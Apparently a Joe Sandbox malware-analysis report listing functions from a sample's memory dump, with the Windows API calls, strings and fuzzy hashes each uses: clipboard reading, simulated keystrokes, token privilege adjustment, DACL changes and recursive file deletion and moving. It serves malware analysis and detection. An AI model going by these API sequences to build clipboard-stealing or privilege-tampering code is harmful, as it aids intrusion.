@GUI_DRAGID, xrefs: 0104FBCC
F, xrefs: 0104FF42

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 2516578528-4164748364
Opcode ID: f5997d6246e92738916815610e397a43a1dc198609b4c8e0be4c178d46abab3e
Instruction ID: 6cac30a1d4bd054cb64e1a9d4827fe4e6ab2f10166e0844bda45c1f5dd73d0e0
Opcode Fuzzy Hash: f5997d6246e92738916815610e397a43a1dc198609b4c8e0be4c178d46abab3e
Instruction Fuzzy Hash: 5032BCB4604246EFEB20DF6CC884AAABBE4FF48354F14066DF6D58B2A1C736D850CB51

Function 0104AACE Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0104B1CD

Strings

%d/%02d/%02d, xrefs: 0104AEFC

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: MessageSend
String ID: %d/%02d/%02d
API String ID: 3850602802-328681919
Opcode ID: cf8519844da48479834cfd0fb9e3c7a2f2f03445b057245ffe05f06be1d2c67c
Instruction ID: 8da05d97507bc22aa41731a320eed83b681398e22782f152dd219f7ceafb447e
Opcode Fuzzy Hash: cf8519844da48479834cfd0fb9e3c7a2f2f03445b057245ffe05f06be1d2c67c
Instruction Fuzzy Hash: F412D2B1600208ABEB259F69CC89FAE7BF8FF45310F004169FA96DB1E1DB759901CB10

Function 00FFEB42 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000), ref: 00FFEB4A
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 01053AEA
IsIconic.USER32(000000FF), ref: 01053AF3
ShowWindow.USER32(000000FF,00000009), ref: 01053B00
SetForegroundWindow.USER32(000000FF), ref: 01053B0A
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 01053B20
GetCurrentThreadId.KERNEL32 ref: 01053B27
GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 01053B33
AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 01053B44
AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 01053B4C
AttachThreadInput.USER32(00000000,?,00000001), ref: 01053B54
SetForegroundWindow.USER32(000000FF), ref: 01053B57
MapVirtualKeyW.USER32(00000012,00000000), ref: 01053B6C
keybd_event.USER32(00000012,00000000), ref: 01053B77
MapVirtualKeyW.USER32(00000012,00000000), ref: 01053B81
keybd_event.USER32(00000012,00000000), ref: 01053B86
MapVirtualKeyW.USER32(00000012,00000000), ref: 01053B8F
keybd_event.USER32(00000012,00000000), ref: 01053B94
MapVirtualKeyW.USER32(00000012,00000000), ref: 01053B9E
keybd_event.USER32(00000012,00000000), ref: 01053BA3
SetForegroundWindow.USER32(000000FF), ref: 01053BA6
AttachThreadInput.USER32(000000FF,?,00000000), ref: 01053BCD

Strings

Shell_TrayWnd, xrefs: 01053AE5

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: a6cd2c69f703fb2b6857cb4ef30d6f524ede05a500001d31546d4848c2861bc0
Instruction ID: 1323b6ee20bf9fe73a1abfff79931b00a62c88d73a5edb2a4fc8e0aaba8ef7c6
Opcode Fuzzy Hash: a6cd2c69f703fb2b6857cb4ef30d6f524ede05a500001d31546d4848c2861bc0
Instruction Fuzzy Hash: 683160B1B40318BBFB315BA68C49F7F7E6CEB44B90F104055FA85AA1D1D6B55900ABA0

Function 0101ACC5 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 223COMMON

Download Yara Rule

APIs

Part of subcall function 0101B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0101B180
Part of subcall function 0101B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0101B1AD
Part of subcall function 0101B134: GetLastError.KERNEL32 ref: 0101B1BA

_memset.LIBCMT ref: 0101AD08
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0101AD5A
CloseHandle.KERNEL32(?), ref: 0101AD6B
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0101AD82
GetProcessWindowStation.USER32 ref: 0101AD9B
SetProcessWindowStation.USER32(00000000), ref: 0101ADA5
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0101ADBF

Part of subcall function 0101AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0101ACC0), ref: 0101AB99
Part of subcall function 0101AB84: CloseHandle.KERNEL32(?,?,0101ACC0), ref: 0101ABAB

Strings

, xrefs: 0101AD17
default, xrefs: 0101ADBA
winsta0, xrefs: 0101AD7D

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: 88ad67b1757d5288197d0d89b5208dc7c231456b1f3b577851e2d52c1b715534
Instruction ID: d0b4fa81a823258f7930f4efa4c07fc61f351e68334df65660d8093a3126654c
Opcode Fuzzy Hash: 88ad67b1757d5288197d0d89b5208dc7c231456b1f3b577851e2d52c1b715534
Instruction Fuzzy Hash: C2817E71A01289EFEF119FA8CC44AEE7BB9FF08304F044159F994A71A9D7398A54DB60

Function 010260DD Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 174filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 01026EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,01025FA6,?), ref: 01026ED8

Part of subcall function 01026EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,01025FA6,?), ref: 01026EF1

Part of subcall function 0102725E: __wsplitpath.LIBCMT ref: 0102727B
Part of subcall function 0102725E: __wsplitpath.LIBCMT ref: 0102728E

Part of subcall function 010272CB: GetFileAttributesW.KERNEL32(?,01026019), ref: 010272CC

_wcscat.LIBCMT ref: 01026149
_wcscat.LIBCMT ref: 01026167
__wsplitpath.LIBCMT ref: 0102618E
FindFirstFileW.KERNEL32(?,?), ref: 010261A4
_wcscpy.LIBCMT ref: 01026209
_wcscat.LIBCMT ref: 0102621C
_wcscat.LIBCMT ref: 0102622F
lstrcmpiW.KERNEL32(?,?), ref: 0102625D
DeleteFileW.KERNEL32(?), ref: 0102626E
MoveFileW.KERNEL32(?,?), ref: 01026289
MoveFileW.KERNEL32(?,?), ref: 01026298
CopyFileW.KERNEL32(?,?,00000000), ref: 010262AD
DeleteFileW.KERNEL32(?), ref: 010262BE
FindNextFileW.KERNEL32(00000000,00000010), ref: 010262E1
FindClose.KERNEL32(00000000), ref: 010262FD
FindClose.KERNEL32(00000000), ref: 0102630B

Strings

\*.*, xrefs: 01026138, 01026147, 01026165

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
String ID: \*.*
API String ID: 1917200108-1173974218
Opcode ID: 9c05f2a16a4d58f36250cc21231a47fdc37917597082c4791ccd75eaf32a69ed
Instruction ID: 052562647d52024f4b34686068cf22a2dd5888275f43785c796125feac98bec5
Opcode Fuzzy Hash: 9c05f2a16a4d58f36250cc21231a47fdc37917597082c4791ccd75eaf32a69ed
Instruction Fuzzy Hash: A3511F7290812DAADB21EB95CC44DEF77FCAF15210F0900EAE9C5E2141DE7697498FA4

Function 01036B0C Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(0107DC00), ref: 01036B36
IsClipboardFormatAvailable.USER32(0000000D), ref: 01036B44
GetClipboardData.USER32(0000000D), ref: 01036B4C
CloseClipboard.USER32 ref: 01036B58
GlobalLock.KERNEL32(00000000), ref: 01036B74
CloseClipboard.USER32 ref: 01036B7E
GlobalUnlock.KERNEL32(00000000), ref: 01036B93
IsClipboardFormatAvailable.USER32(00000001), ref: 01036BA0
GetClipboardData.USER32(00000001), ref: 01036BA8
GlobalLock.KERNEL32(00000000), ref: 01036BB5
GlobalUnlock.KERNEL32(00000000), ref: 01036BE9
CloseClipboard.USER32 ref: 01036CF6

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: 5d229722721693aa1410ddae38091411a9efa7c5fdfefa24ba440ef560bc57b9
Instruction ID: 451a4d5f63d8261b3a728d80478990dadeba007aae2ed3547f3929f148f0b6e2
Opcode Fuzzy Hash: 5d229722721693aa1410ddae38091411a9efa7c5fdfefa24ba440ef560bc57b9
Instruction Fuzzy Hash: 29519071300206ABE324AFA5DD45F7E77A8AF98B11F000029F6D6D61E0DF6AD9058B62

Function 0102F5FA Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0102F62B
FindClose.KERNEL32(00000000), ref: 0102F67F
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0102F6A4
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0102F6BB
FileTimeToSystemTime.KERNEL32(?,?), ref: 0102F6E2
__swprintf.LIBCMT ref: 0102F72E
__swprintf.LIBCMT ref: 0102F767
__swprintf.LIBCMT ref: 0102F7BB

Part of subcall function 0100172B: __woutput_l.LIBCMT ref: 01001784

__swprintf.LIBCMT ref: 0102F809
__swprintf.LIBCMT ref: 0102F858
__swprintf.LIBCMT ref: 0102F8A7
__swprintf.LIBCMT ref: 0102F8F6

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 0102F728
%4d, xrefs: 0102F761
%02d, xrefs: 0102F7B0, 0102F7B9, 0102F807, 0102F856, 0102F8A5, 0102F8F4

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 835046349-2428617273
Opcode ID: 6b2b57167532e2ff2768bf7780b5916a6187ab4769d03d8a6097d290c69aad2e
Instruction ID: 79791397f5ac4193d88e07867cfeadd050c07c48f46cf902db790958081347af
Opcode Fuzzy Hash: 6b2b57167532e2ff2768bf7780b5916a6187ab4769d03d8a6097d290c69aad2e
Instruction Fuzzy Hash: C1A129B2508345ABD350EBA5CC85DAFB7ECBF98700F40081EF685C6191EB78D949DB62

Function 01031B2F Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 01031B50
_wcscmp.LIBCMT ref: 01031B65
_wcscmp.LIBCMT ref: 01031B7C
GetFileAttributesW.KERNEL32(?), ref: 01031B8E
SetFileAttributesW.KERNEL32(?,?), ref: 01031BA8
FindNextFileW.KERNEL32(00000000,?), ref: 01031BC0
FindClose.KERNEL32(00000000), ref: 01031BCB
FindFirstFileW.KERNEL32(*.*,?), ref: 01031BE7
_wcscmp.LIBCMT ref: 01031C0E
_wcscmp.LIBCMT ref: 01031C25
SetCurrentDirectoryW.KERNEL32(?), ref: 01031C37
SetCurrentDirectoryW.KERNEL32(010939FC), ref: 01031C55
FindNextFileW.KERNEL32(00000000,00000010), ref: 01031C5F
FindClose.KERNEL32(00000000), ref: 01031C6C
FindClose.KERNEL32(00000000), ref: 01031C7C

Strings

*.*, xrefs: 01031BE2

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: cffe345db4fa4d1e87cd89a1c0e413d543b301a044f69c1efc92ae91ffef541a
Instruction ID: b01a14e014bef9c3ee979e5659585ce8ac50ccbdfebbc935dabc64d630ab9985
Opcode Fuzzy Hash: cffe345db4fa4d1e87cd89a1c0e413d543b301a044f69c1efc92ae91ffef541a
Instruction Fuzzy Hash: 4831C53160021ABADF24ABF5DC48ADE77ECAF49220F044195E9C1E7090EB75DA458F64

Function 01031C8A Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 01031CAB
_wcscmp.LIBCMT ref: 01031CC0
_wcscmp.LIBCMT ref: 01031CD7

Part of subcall function 01026BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 01026BEF

FindNextFileW.KERNEL32(00000000,?), ref: 01031D06
FindClose.KERNEL32(00000000), ref: 01031D11
FindFirstFileW.KERNEL32(*.*,?), ref: 01031D2D
_wcscmp.LIBCMT ref: 01031D54
_wcscmp.LIBCMT ref: 01031D6B
SetCurrentDirectoryW.KERNEL32(?), ref: 01031D7D
SetCurrentDirectoryW.KERNEL32(010939FC), ref: 01031D9B
FindNextFileW.KERNEL32(00000000,00000010), ref: 01031DA5
FindClose.KERNEL32(00000000), ref: 01031DB2
FindClose.KERNEL32(00000000), ref: 01031DC2

Strings

*.*, xrefs: 01031D28

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: e1459dce3dd0ae265047c61946c5c85e3c2661c9090106d429d7cb92b24c32a9
Instruction ID: a4d072fe5517d2081cc604d5c889a211e080a5108a086ebe00f6d32d96d5b16e
Opcode Fuzzy Hash: e1459dce3dd0ae265047c61946c5c85e3c2661c9090106d429d7cb92b24c32a9
Instruction Fuzzy Hash: 2231283160021ABADF21BFA4DC08ADE3BECAF4A220F144595E9C1E7090DB31CA45CF54

Function 00FE7D19 Relevance: 23.7, APIs: 2, Strings: 11, Instructions: 962COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FE7DBD

Strings

^, xrefs: 00FE7D96
], xrefs: 00FE7D9F
\, xrefs: 00FE7D89
Q\E, xrefs: 00FE86D6
[:>:]], xrefs: 00FE7D37
\, xrefs: 0105F95B
\b(?<=\w), xrefs: 0105F877
\, xrefs: 00FE7E1D
\b(?=\w), xrefs: 0105F85E
[:<:]], xrefs: 00FE7D1D
[, xrefs: 00FE7E14

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: _memset
String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
API String ID: 2102423945-2023335898
Opcode ID: a743049a882d65afab811c5aaa37cd3e1432dfac9d35f62a2ae6671a4bac99ad
Instruction ID: 3a2cb7ea437878617c292113a04cc455c9653a2ef4304526d4044ef12719fa30
Opcode Fuzzy Hash: a743049a882d65afab811c5aaa37cd3e1432dfac9d35f62a2ae6671a4bac99ad
Instruction Fuzzy Hash: A782D372D0425ACBDF64DF99C8807EEBBB1FF44320F2481A9D899AB251D7349D81DB80

Function 0103091D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 010309DF
SystemTimeToFileTime.KERNEL32(?,?), ref: 010309EF
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 010309FB
__wsplitpath.LIBCMT ref: 01030A59
_wcscat.LIBCMT ref: 01030A71
_wcscat.LIBCMT ref: 01030A83
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 01030A98
SetCurrentDirectoryW.KERNEL32(?), ref: 01030AAC
SetCurrentDirectoryW.KERNEL32(?), ref: 01030ADE
SetCurrentDirectoryW.KERNEL32(?), ref: 01030AFF
_wcscpy.LIBCMT ref: 01030B0B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 01030B4A

Strings

*.*, xrefs: 01030B05

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
String ID: *.*
API String ID: 3566783562-438819550
Opcode ID: 31a53613c9c1223165894d5f1d039744070e175bfbf6504f42a379f1b9983190
Instruction ID: bc85bdb3260d874f676f3fc7bb9014ac311f53166d608ee5b1793162234dbd75
Opcode Fuzzy Hash: 31a53613c9c1223165894d5f1d039744070e175bfbf6504f42a379f1b9983190
Instruction Fuzzy Hash: 186168725042059FD710EF65C840AAEB3E8FF99310F04895EFAC9C7251DB35EA45CB92

Function 0101A66C Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0101ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0101ABD7
Part of subcall function 0101ABBB: GetLastError.KERNEL32(?,0101A69F,?,?,?), ref: 0101ABE1
Part of subcall function 0101ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0101A69F,?,?,?), ref: 0101ABF0
Part of subcall function 0101ABBB: HeapAlloc.KERNEL32(00000000,?,0101A69F,?,?,?), ref: 0101ABF7
Part of subcall function 0101ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0101AC0E

Part of subcall function 0101AC56: GetProcessHeap.KERNEL32(00000008,0101A6B5,00000000,00000000,?,0101A6B5,?), ref: 0101AC62
Part of subcall function 0101AC56: HeapAlloc.KERNEL32(00000000,?,0101A6B5,?), ref: 0101AC69
Part of subcall function 0101AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0101A6B5,?), ref: 0101AC7A

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0101A6D0
_memset.LIBCMT ref: 0101A6E5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0101A704
GetLengthSid.ADVAPI32(?), ref: 0101A715
GetAce.ADVAPI32(?,00000000,?), ref: 0101A752
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0101A76E
GetLengthSid.ADVAPI32(?), ref: 0101A78B
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0101A79A
HeapAlloc.KERNEL32(00000000), ref: 0101A7A1
GetLengthSid.ADVAPI32(?,00000008,?), ref: 0101A7C2
CopySid.ADVAPI32(00000000), ref: 0101A7C9
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0101A7FA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0101A820
SetUserObjectSecurity.USER32(?,00000004,?), ref: 0101A834

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 822ce36346a73b5ea59ba11160f95441fefc637bfcaddd0d3b552b8aa193dabf
Instruction ID: 3cf70bea354d2c1858778a0465863027b8166be1e5b9f03a866911f27231c8a9
Opcode Fuzzy Hash: 822ce36346a73b5ea59ba11160f95441fefc637bfcaddd0d3b552b8aa193dabf
Instruction Fuzzy Hash: 87514E71A0114AEFEF10DF95DC44AEEBBB9FF08210F048169F991A7295D7399A06CB60

Function 00FE6F07 Relevance: 18.4, Strings: 14, Instructions: 883COMMON

Download Yara Rule

Strings

NO_START_OPT), xrefs: 01062CD1
BSR_UNICODE), xrefs: 01062EBA
NO_AUTO_POSSESS), xrefs: 01062CB0
LIMIT_MATCH=, xrefs: 01062CF2
UCP), xrefs: 01062C8F
BSR_ANYCRLF), xrefs: 01062EA0
CR), xrefs: 01062E09
LF), xrefs: 01062E26
UTF), xrefs: 01062C7C
CRLF), xrefs: 01062E43
LIMIT_RECURSION=, xrefs: 01062D7E
ANY), xrefs: 01062E60
UTF16), xrefs: 01062C56
ANYCRLF), xrefs: 01062E7D

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID:
String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
API String ID: 0-4052911093
Opcode ID: 2195ea5758003629828c969040ff60fa49742d74b0e7169abfb2d2ce734635c0
Instruction ID: 0c672ebfa8f3bc65926d778b7141099ca67dc689f913313ae3736ca927b0de99
